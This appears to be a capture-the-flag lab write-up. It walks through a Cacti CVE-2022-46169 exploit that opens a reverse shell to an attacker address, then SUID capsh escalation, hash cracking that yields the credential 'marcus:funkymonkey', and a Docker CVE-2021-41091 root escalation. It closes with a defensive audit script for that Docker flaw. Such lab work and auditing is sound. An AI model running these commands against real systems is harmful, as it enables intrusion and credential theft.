We find an exploit on GitHub that we can use to get user.

python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.11 --LPORT=9999

MD5 hashes found:

admin','21232f297a57a5a743894a0e4a801fc3

guest','43e9a4ab75570f5b'

These are pointless.

We find a file called entrypoint.sh which has SQL creds, however none work:

mysql --host=db --user=root --password=root cacti

SUID capsh is available, so we can use this to become root:

cd /sbin

./capsh --gid=0 --uid=0 --

However, we still have no flags.

Looks like mysql does work (just not for me):

mysql --host=db --user=root --password=root cacti -e "show table

We can get the hash for marcus: $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

marcus:funkymonkey

On marcus we can find the Docker version with:

docker -

Docker version 20.10.5, which has an exploit: CVE-2021-41091

Once we use the exploit, we can cd var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bash

Execute ./bash -p

We are root.
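
The last step works because the Docker data directory on the host lets an unprivileged user traverse into a container's filesystem and run a setuid binary there. The script below is an added example for checking a host for that condition; it is not part of the original notes or of Docker's tooling. The function names and FIXED_VERSION are this example's own, with 20.10.9 being the Moby release that fixed CVE-2021-41091.

```shell
#!/bin/sh
# Added example: host-side audit for the CVE-2021-41091 precondition.
# Function names and FIXED_VERSION are this example's own, not Docker tooling.
FIXED_VERSION="20.10.9"   # Moby release that restricted data-directory modes

# version_lt A B: succeed when dotted version A sorts strictly before B.
# Non-numeric suffixes such as "+dfsg1" are ignored.
version_lt() {
    [ "$1" = "$2" ] && return 1
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        if [ "$a" = "$x" ]; then a=""; else a=${a#*.}; fi
        if [ "$b" = "$y" ]; then b=""; else b=${b#*.}; fi
        x=${x%%[!0-9]*}; y=${y%%[!0-9]*}
        [ "${x:-0}" -lt "${y:-0}" ] && return 0
        [ "${x:-0}" -gt "${y:-0}" ] && return 1
    done
    return 1
}

# other_can_reach ROOT FILE: succeed when every directory from FILE's parent
# up to and including ROOT grants traverse (o+x) permission to "other".
other_can_reach() {
    root=${1%/}; dir=$(dirname "$2")
    while :; do
        [ -n "$(find "$dir" -maxdepth 0 -perm -001)" ] || return 1
        case $dir in "$root"|/|.) return 0 ;; esac
        dir=$(dirname "$dir")
    done
}

# reachable_setuid ROOT: print setuid files under ROOT that are o+x and sit
# below directories an unprivileged user can traverse.
reachable_setuid() {
    find "${1%/}" -type f -perm -4001 2>/dev/null | while IFS= read -r f; do
        if other_can_reach "$1" "$f"; then printf '%s\n' "$f"; fi
    done
}

# Run as root on the Docker host, e.g.: sh audit.sh /var/lib/docker
if [ -d "${1:-}" ]; then
    v=$(docker version --format '{{.Server.Version}}' 2>/dev/null) || v=""
    if [ -n "$v" ] && version_lt "$v" "$FIXED_VERSION"; then
        echo "Docker $v predates $FIXED_VERSION"
    fi
    reachable_setuid "$1"
fi
```

Any path it prints is a setuid file that a local non-root user can reach through the data directory. After upgrading to a fixed release, running containers need to be stopped and restarted for the tightened permissions to apply.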